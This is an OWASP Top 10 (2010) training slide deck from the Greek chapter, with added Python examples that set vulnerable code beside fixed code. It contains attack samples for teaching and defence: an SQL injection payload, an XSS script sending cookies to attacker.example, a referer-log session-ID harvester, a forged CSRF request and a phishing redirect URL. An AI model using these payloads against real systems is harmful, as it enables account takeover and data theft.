2. Your Code is Part of Your Security Perimeter
Your security “perimeter” has huge holes at the application layer.
[Diagram: an APPLICATION ATTACK passes straight through the Hardened OS, Web Server and App Server layers and lands on the Custom Developed Application Code]
You can’t use network layer protection (firewall, SSL, IDS, hardening) to stop or detect application layer attacks.
OWASP 3
3. OWASP
The Open Web Application Security Project
http://www.owasp.org
http://www.owasp.gr – http://blog.owasp.gr
4. What is OWASP?
Open Web Application Security Project
Worldwide, free and open community
Non-profit, volunteer driven organization
Mission: improve application software security
Promotes secure software development
An open forum for discussion
A free resource for any development team
Publications, Articles, Standards
Testing and Training Software
Local Chapters & Mailing Lists
5. The Greek Chapter
Created in 2005 but active since early 2007
Mission: raise security awareness in Greece
Activities:
Translation of OWASP documentation
Mailing list
Blog
Participation in working groups and conferences
Awareness
~120 members
http://www.owasp.gr - http://blog.owasp.gr
6. OWASP Body of Knowledge
[Diagram: the OWASP body of knowledge, built around the OWASP Community Platform (wiki, forums, mailing lists) and backed by the OWASP Foundation 501c3]
Core Application Security Knowledge Base: AppSec principles covering threat agents, attacks, vulnerabilities, impacts, and countermeasures
Acquiring and Building Secure Applications: Guide to Building Secure Web Applications and Web Services
Verifying Application Security: Guide to Application Security Testing, Guide to Application Security Code Review, and tools for scanning, testing, simulating, and reporting web application security issues
Managing Application Security: guidance and tools for measuring and managing application security
Education and CBT: web based learning environment and Guide for Learning Application Security
Research to Secure New Technologies: research projects to figure out how to secure the use of new technologies (like Ajax)
AppSec Conferences, Chapters, Projects
8. What’s a WebGoat
OWASP project with ~115,000 downloads
Deliberately insecure Java EE web application
Teaches common application vulnerabilities via a
series of individual lessons
12. OWASP Top 10 Risk Rating Methodology
[Figure: risk rating table; the Injection example works out to a 1.66 weighted risk rating]
13. OWASP Top 10 2010
http://www.owasp.org/index.php/Top_10
14. A1. Injection
[Diagram: the Account Summary form (fields Account, SKU) sends an HTTP request to the Custom Code, which runs on the App Server, Web Server and Hardened OS; the Custom Code issues a SQL query to the DB Table and returns an HTTP response]
Attack value entered in the Account field: ' OR 1=1--
Resulting query: "SELECT * FROM accounts WHERE acct='' OR 1=1--'"
Rows returned: Acct:5424-6066-2134-4334, Acct:4128-7574-3921-0192, Acct:5424-9383-2039-4029, Acct:4128-0004-1234-0293
1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user
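The exchange above, as an added example that is not from the original slides or from OWASP: a Python account lookup that builds the query by string concatenation (step 3 of the slide) beside a parameterised version, both run against an in-memory SQLite table. The account rows, owner names and card numbers are constructed for this example.

```python
import sqlite3

# Constructed sample data for this example (not the slide's real table):
# account number, owner, card number on file.
ACCOUNTS = [
    ("6065", "alice", "5424-6066-2134-4334"),
    ("6066", "bob", "4128-7574-3921-0192"),
    ("6067", "carol", "5424-9383-2039-4029"),
]


def make_db():
    """In-memory SQLite database standing in for the slide's DB table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct TEXT, owner TEXT, card TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return conn


def lookup_vulnerable(conn, acct):
    """Step 3 of the slide: the form value is concatenated into the SQL text,
    so the attacker's quote and OR clause become part of the query."""
    sql = "SELECT owner, card FROM accounts WHERE acct='" + acct + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, acct):
    """Parameterised query: the value travels separately from the SQL, so
    "' OR 1=1--" is just a (non-matching) account number."""
    return conn.execute(
        "SELECT owner, card FROM accounts WHERE acct=?", (acct,)
    ).fetchall()


def demo(payload="' OR 1=1--"):
    """Run the slide's payload through both versions and return the rows."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, payload),
        "safe": lookup_safe(conn, payload),
    }


if __name__ == "__main__":
    for variant, rows in demo().items():
        print(variant, "->", rows)
```

With the slide's payload the concatenated query becomes `SELECT owner, card FROM accounts WHERE acct='' OR 1=1--'` and returns every row; the parameterised query returns nothing because the database never interprets the value as SQL.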
15. A2. Cross-Site Scripting (XSS)
1. Attacker sets the trap – update my profile: attacker enters a malicious script into a web page that stores the data on the server (application with stored XSS vulnerability)
2. Victim views page – sees attacker profile: script runs inside victim’s browser with full access to the DOM and cookies
3. Script silently sends attacker victim’s session cookie
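The stored XSS flow above, as an added Python example (not code from the slides or from OWASP): the profile page rendered with and without HTML output encoding, plus the session cookie flag that blunts step 3. The profile texts and the attacker hostname `attacker.example` are constructed for the example.

```python
import html
import re

# Constructed profile submissions (not from the slides). "mallory" stores the
# attacker's payload: a script that ships the viewer's cookie to a host the
# attacker controls (attacker.example is a placeholder hostname).
PROFILES = {
    "alice": "Hi, I love hiking!",
    "mallory": "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>",
}


def render_profile_vulnerable(name):
    """Stored XSS: the saved text is pasted into the page unchanged."""
    return '<div class="bio">' + PROFILES[name] + '</div>'


def render_profile_safe(name):
    """Output encoding for HTML body context: every < > & " ' becomes an
    entity, so the browser shows the payload as text instead of running it."""
    return '<div class="bio">' + html.escape(PROFILES[name], quote=True) + '</div>'


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def executes_script(fragment):
    """Crude check for the tests: is there still a live <script> tag?"""
    return SCRIPT_TAG.search(fragment) is not None


def session_cookie_header(session_id):
    """Defence in depth for step 3: HttpOnly keeps document.cookie from
    reading the session cookie even if an XSS bug slips through."""
    return "Set-Cookie: JSESSIONID=%s; Path=/; Secure; HttpOnly" % session_id


if __name__ == "__main__":
    print(render_profile_vulnerable("mallory"))
    print(render_profile_safe("mallory"))
```

`html.escape` is correct for text placed in the HTML body or in a quoted attribute; text inserted into a JavaScript block, a URL or CSS needs the encoding for that context instead, which is what the ESAPI Encoder's per-context methods are for.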
16. A3. Broken Authentication and Session Management
1. User sends credentials
2. Site uses URL rewriting (i.e., puts the session in the URL): www.boi.com?JSESSIONID=9FA1DB9EA...
3. User clicks on a link to http://www.hacker.com in a forum
4. Hacker checks referer logs on www.hacker.com and finds user’s JSESSIONID
5. Hacker uses JSESSIONID and takes over victim’s account
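Step 4 above, as an added Python example (not code from the slides or from OWASP): a parser that walks the referer column of an access log and pulls out session identifiers that arrived in the URL, handling both forms a servlet container uses. The log lines, client addresses and session values are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache combined format for www.hacker.com
# (not real data). The referer field is the URL the victim came from.
HACKER_LOG = """\
203.0.113.7 - - [10/Oct/2010:13:55:36 +0000] "GET /cool-link HTTP/1.1" 200 512 "http://www.boi.com/account;jsessionid=9FA1DB9EA4C1D2E3F4A5B6C7" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2010:13:56:01 +0000] "GET /cool-link HTTP/1.1" 200 512 "http://www.boi.com/account?JSESSIONID=0AF4C2B8D9E1F0A1B2C3D4E5" "Mozilla/5.0"
203.0.113.11 - - [10/Oct/2010:13:57:12 +0000] "GET /cool-link HTTP/1.1" 200 512 "http://www.boi.com/account" "Mozilla/5.0"
203.0.113.12 - - [10/Oct/2010:13:58:44 +0000] "GET /cool-link HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)


def session_id_from_url(url):
    """Return a JSESSIONID carried in the URL, or None.

    Servlet containers rewrite it either as a path parameter
    (/account;jsessionid=...) or as a query parameter (?JSESSIONID=...)."""
    parts = urlsplit(url)
    m = re.search(r";jsessionid=([^;/?#]+)", parts.path, re.IGNORECASE)
    if m:
        return m.group(1)
    for key, values in parse_qs(parts.query).items():
        if key.lower() == "jsessionid" and values:
            return values[0]
    return None


def harvest_sessions(log_text):
    """Step 4 of the slide: walk the referer log and collect leaked
    session identifiers as (client_ip, session_id) pairs."""
    found = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        sid = session_id_from_url(m.group("referer"))
        if sid:
            found.append((m.group("ip"), sid))
    return found


if __name__ == "__main__":
    for ip, sid in harvest_sessions(HACKER_LOG):
        print(ip, "leaked", sid)
```

The same parser run over your own logs is a cheap check that no application of yours is leaking sessions this way. The fix on the application side is to stop URL rewriting altogether; on a Servlet 3.0 container that is `<session-config><tracking-mode>COOKIE</tracking-mode></session-config>` in web.xml, with the cookie marked Secure and HttpOnly.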
17. A4. Insecure Direct Object References
Attacker notices his acct parameter is 6065: https://www.onlinebank.com/user?acct=6065
He modifies it to a nearby number: ?acct=6066
Attacker views the victim’s account information
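The tampered request above, as an added Python example (not code from the slides or from OWASP): a handler that trusts the `acct` parameter beside one that checks every direct reference against the logged-in user before returning it. The account records and user names are constructed for the example.

```python
from urllib.parse import parse_qs

# Constructed account records keyed by the direct reference that appears in
# the URL (not the slide's real bank data).
ACCOUNTS = {
    "6065": {"owner": "attacker", "balance": 120.50},
    "6066": {"owner": "victim", "balance": 98000.00},
}


class Forbidden(Exception):
    pass


def get_account_vulnerable(session_user, acct):
    """Trusts the acct parameter: any authenticated user reads any account."""
    return ACCOUNTS[acct]


def get_account_safe(session_user, acct):
    """Authorise every direct reference against the logged-in user.

    Missing and not-owned accounts get the same error so the attacker
    cannot learn which nearby numbers exist."""
    record = ACCOUNTS.get(acct)
    if record is None or record["owner"] != session_user:
        raise Forbidden("account not available to this user")
    return record


def handle_request(session_user, query_string, lookup=get_account_safe):
    """Simulate GET /user?acct=... for a user whose session is already set."""
    params = parse_qs(query_string)
    acct = params.get("acct", [""])[0]
    return lookup(session_user, acct)


if __name__ == "__main__":
    print(handle_request("attacker", "acct=6065"))
    try:
        handle_request("attacker", "acct=6066")
    except Forbidden as e:
        print("acct=6066:", e)
```

The check has to happen on every request that dereferences the parameter, not only on the page that listed the user's own accounts; the attacker never went through that page.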
18. A5. Cross-Site Request Forgery (CSRF)
1. Attacker sets the trap on some website on the internet (or simply via an e-mail): a hidden <img> tag contains an attack against the vulnerable site (application with CSRF vulnerability)
2. While logged into the vulnerable site, victim views attacker site: the <img> tag is loaded by the browser, which sends a GET request (including credentials) to the vulnerable site
3. Vulnerable site sees a legitimate request from the victim and performs the action requested
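The three steps above, as an added Python example (not code from the slides or from OWASP): a toy bank whose transfer endpoint accepts any request carrying the session cookie, beside one protected with the synchronizer token pattern. Balances, user names, the `bank.example` host and the forged request are constructed for the example.

```python
import hmac
import secrets


class CsrfRejected(Exception):
    pass


class Bank:
    """Toy bank with constructed balances; sessions live server-side and the
    browser identifies one with a cookie the attacker's page cannot read."""

    def __init__(self):
        self.balances = {"victim": 5000, "attacker": 0}
        self.sessions = {}

    def login(self, user):
        sid = secrets.token_hex(16)
        # One unguessable token per session, embedded in every state-changing form.
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def csrf_token(self, sid):
        return self.sessions[sid]["csrf"]

    def transfer_form(self, sid):
        """The legitimate page: only this origin can put the token in a form."""
        return ('<form method="POST" action="/transfer">'
                '<input type="hidden" name="csrf" value="%s">'
                '<input name="to"><input name="amount"><button>Send</button>'
                '</form>' % self.csrf_token(sid))

    def _move(self, frm, to, amount):
        self.balances[frm] -= amount
        self.balances[to] += amount

    def transfer_vulnerable(self, cookie_sid, method, params):
        """Acts on any request carrying a valid session cookie, so the <img>
        tag's GET from the attacker's page is indistinguishable from a real one."""
        user = self.sessions[cookie_sid]["user"]
        self._move(user, params["to"], int(params["amount"]))

    def transfer_safe(self, cookie_sid, method, params):
        """Synchronizer token: the request must be a POST and carry the
        session's secret token, which a cross-site <img> or form cannot know."""
        if method != "POST":
            raise CsrfRejected("state changes must use POST")
        session = self.sessions[cookie_sid]
        supplied = params.get("csrf", "")
        if not hmac.compare_digest(supplied, session["csrf"]):
            raise CsrfRejected("missing or invalid CSRF token")
        self._move(session["user"], params["to"], int(params["amount"]))


# The attacker's page: <img src="https://bank.example/transfer?to=attacker&amount=1000">
# (bank.example is a placeholder host). The browser attaches the victim's cookie
# automatically; this is the request the vulnerable site receives.
FORGED_REQUEST = ("GET", {"to": "attacker", "amount": "1000"})


if __name__ == "__main__":
    bank = Bank()
    sid = bank.login("victim")
    bank.transfer_vulnerable(sid, *FORGED_REQUEST)
    print("after forged GET on vulnerable endpoint:", bank.balances)
    try:
        bank.transfer_safe(sid, *FORGED_REQUEST)
    except CsrfRejected as e:
        print("safe endpoint rejected it:", e)
```

Requiring POST alone is not enough (an auto-submitting cross-site form can POST); the token is what the attacker's page cannot obtain, because the same-origin policy stops it from reading the bank's form. The constant-time comparison is a habit worth keeping for any secret check.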
19. A6 – Security Misconfiguration
Web applications rely on a secure foundation
• Everywhere from the OS up through the App Server
• Don’t forget all the libraries you are using!!
Is your source code a secret?
• Think of all the places your source code goes
• Security should not require secret source code
Configuration management (CM) must extend to all parts of the application
• All credentials should change in production
Typical Impact
• Install backdoor through missing OS or server patch
• XSS flaw exploits due to missing application framework patches
• Unauthorized access to default accounts, application functionality or data,
or unused but accessible functionality due to poor server configuration
20. A7. Insecure Cryptographic Storage
1. Victim enters credit card number in form
2. Error handler logs CC details because merchant gateway is unavailable
3. Logs are accessible to all members of IT staff for debugging purposes
4. Malicious insider steals 4 million credit card numbers
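Step 2 above, as an added Python example (not code from the slides or from OWASP): a scrubber that the error handler runs over a message before writing it, masking anything that looks like a card number and passes the Luhn check, so an order number with the same shape is left alone. The log line uses published test card numbers and is constructed for the example.

```python
import re

# Candidate card numbers: 13 to 19 digits, optionally separated by single
# spaces or hyphens, not embedded in a longer digit run.
PAN_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Constructed log line of the kind the slide's error handler would write
# (test card numbers, not real ones).
SAMPLE_LOG_LINE = (
    '2010-10-10 13:55:36 ERROR gateway unreachable; payload='
    '{"card":"4111-1111-1111-1111","exp":"12/12","cvv":"123",'
    '"order":"ORD-20101010-000123","alt":"5555 5555 5555 4444"}'
)


def luhn_ok(digits):
    """Luhn checksum; filters out most non-card digit runs (order ids, etc.)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pans(text):
    """Replace every Luhn-valid card number with its last four digits."""
    def repl(m):
        raw = m.group(0)
        digits = re.sub(r"[ -]", "", raw)
        if not luhn_ok(digits):
            return raw
        return "*" * (len(digits) - 4) + digits[-4:]
    return PAN_RE.sub(repl, text)


def log_error(message, sink):
    """Error-handler replacement for the slide's step 2: scrub, then log."""
    sink.append(mask_pans(message))


if __name__ == "__main__":
    lines = []
    log_error(SAMPLE_LOG_LINE, lines)
    print(lines[0])
```

Scrubbing is a backstop, not the design: the error handler should never have the full card number in hand, and the CVV must not be stored or logged at all. Logs containing scrubbed payloads still need the same access control as the data store they were copied from.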
21. A8. Failure to Restrict URL Access
Attacker notices the URL https://www.onlinebank.com/user/getAccounts indicates his role: /user/getAccounts
He modifies it to another directory (role): /admin/getAccounts, or /manager/getAccounts
Attacker views more accounts than just their own
22. A9. Insufficient Transport Layer Protection
[Diagram: Custom Code exchanging traffic with the External Victim, Business Partners, Employees and Backend Systems]
1. External attacker steals credentials and data off network
2. Internal attacker steals credentials and data from internal network
23. A10. Unvalidated Redirects and Forwards
1. Attacker sends attack to victim via email or webpage:
From: Internal Revenue Service
Subject: Your Unclaimed Tax Refund
Our records show you have an unclaimed federal tax refund. Please click here to initiate your claim.
2. Victim clicks link containing unvalidated parameter: request sent to vulnerable site, including attacker’s destination site as parameter, e.g. http://www.irs.gov/taxrefund/claim.jsp?year=2006&…&dest=www.evilsite.com
3. Application redirects victim to attacker’s site
4. Evil site installs malware on victim, or phishes for private information
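Step 3 above, as an added Python example (not code from the slides or from OWASP): a validator for the `dest` parameter that accepts only same-site paths or absolute http(s) URLs on an allow-listed host, and falls back to a fixed landing page otherwise. It goes beyond the slide's bare hostname by also rejecting the scheme-relative, backslash, userinfo and `javascript:` variants that get past naive prefix checks. The allow-list, which reuses the slide's example site, and the fallback path are assumptions for the example.

```python
from urllib.parse import urlsplit

# Constructed allow-list: hosts the application may redirect to. The slide's
# example site is used here as the trusted host; the attacker controls the
# dest parameter.
ALLOWED_HOSTS = {"www.irs.gov"}
DEFAULT_LANDING = "/"


def is_safe_redirect(dest, allowed_hosts=ALLOWED_HOSTS):
    """Accept only same-site paths or absolute http(s) URLs on an allowed host."""
    if not dest:
        return False
    # Browsers treat backslash as a slash in URLs, so normalise before parsing
    # to stop "/\evil.example" from being read as a relative path.
    candidate = dest.strip().replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:
        return False
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False          # javascript:, data:, and bare "host:port" forms
    if parts.netloc:
        # Absolute or scheme-relative ("//host/...") URL: host must be allowed.
        # parts.hostname strips userinfo and port, so "www.irs.gov@evil" fails.
        return parts.hostname in allowed_hosts
    # No authority part: require an absolute path on this site.
    return candidate.startswith("/") and not candidate.startswith("//")


def redirect_target(dest):
    """Step 3 of the slide, fixed: unvalidated destinations fall back to a
    fixed landing page instead of being followed."""
    return dest if is_safe_redirect(dest) else DEFAULT_LANDING


if __name__ == "__main__":
    for d in ["www.evilsite.com", "/taxrefund/status", "//www.evilsite.com/"]:
        print(repr(d), "->", redirect_target(d))
```

Where the set of destinations is small, the stronger design is to pass an index into a server-side table instead of a URL at all, so there is nothing to validate.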
26. Goals and Purpose
To define building blocks for an assurance program
Delineate all functions within an organisation that could be
improved over time
To allow organizations to create customized roadmaps
Each organisation can choose the order and extent they improve
each function
To provide sample roadmaps for common types of
organisations
Each roadmap is a baseline that can be tweaked based on the
specific concerns of a given organisation
28. Imagine an Enterprise Security API
All the security controls a developer needs
Standard
Centralized
Organized
Integrated
High Quality
Intuitive
Tested
Solves the problems of missing and broken controls
29. Enterprise Security API
[Diagram: the Custom Enterprise Web Application calls the Enterprise Security API, which in turn wraps the Existing Enterprise Security Services/Libraries]
Enterprise Security API components: Authenticator, User, AccessController, AccessReferenceMap, Validator, Encoder, HTTPUtilities, Encryptor, EncryptedProperties, Randomizer, Exception Handling, Logger, IntrusionDetector, SecurityConfiguration
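As an added illustration of the AccessReferenceMap component listed above (example code written here in Python, not ESAPI's own Java implementation): a per-session map that hands the browser random tokens in place of database keys, so the A4 scenario's `acct=6066` has nothing to tamper with. It complements a per-request ownership check rather than replacing it. The owned-accounts table and user names are constructed for the example.

```python
import secrets


class AccessControlError(Exception):
    pass


class RandomAccessReferenceMap:
    """Per-session indirect references in the style of ESAPI's
    AccessReferenceMap (an illustration, not ESAPI's code).

    Direct references (database keys) never leave the server; the client
    only ever sees random tokens that are meaningless in any other session."""

    def __init__(self, direct_refs=()):
        self._indirect_of = {}
        self._direct_of = {}
        for ref in direct_refs:
            self.add_direct_reference(ref)

    def add_direct_reference(self, direct):
        if direct in self._indirect_of:
            return self._indirect_of[direct]
        while True:
            indirect = secrets.token_urlsafe(6)
            if indirect not in self._direct_of:
                break
        self._indirect_of[direct] = indirect
        self._direct_of[indirect] = direct
        return indirect

    def get_indirect_reference(self, direct):
        try:
            return self._indirect_of[direct]
        except KeyError:
            raise AccessControlError("object not accessible in this session")

    def get_direct_reference(self, indirect):
        """Called when a request comes in: anything not issued to this
        session, including a raw database key, is refused."""
        try:
            return self._direct_of[indirect]
        except KeyError:
            raise AccessControlError("object not accessible in this session")


# Constructed data: which accounts each user owns.
OWNED_ACCOUNTS = {"attacker": ["6065"], "victim": ["6066"]}


def build_session_map(user):
    """Populated at login with only the objects this user may reach."""
    return RandomAccessReferenceMap(OWNED_ACCOUNTS[user])


def account_link(arm, direct_acct):
    """Link rendered into the page: carries the indirect token, not the key."""
    return "/user?acct=" + arm.get_indirect_reference(direct_acct)


if __name__ == "__main__":
    arm = build_session_map("attacker")
    print(account_link(arm, "6065"))
    try:
        arm.get_direct_reference("6066")
    except AccessControlError as e:
        print("acct=6066:", e)
```

The map is populated from the user's own authorised object set, which is the step that actually enforces access; the random tokens stop guessing and enumeration and keep internal identifiers out of logs and referers.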